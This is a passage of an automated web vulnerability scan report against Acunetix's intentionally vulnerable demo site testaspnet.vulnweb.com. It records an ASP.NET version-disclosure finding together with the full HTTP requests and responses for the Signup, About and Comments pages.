entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=2 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:35:22 GMT </pubDate> </item> </channel> </rss>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Content-Length: 1373 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
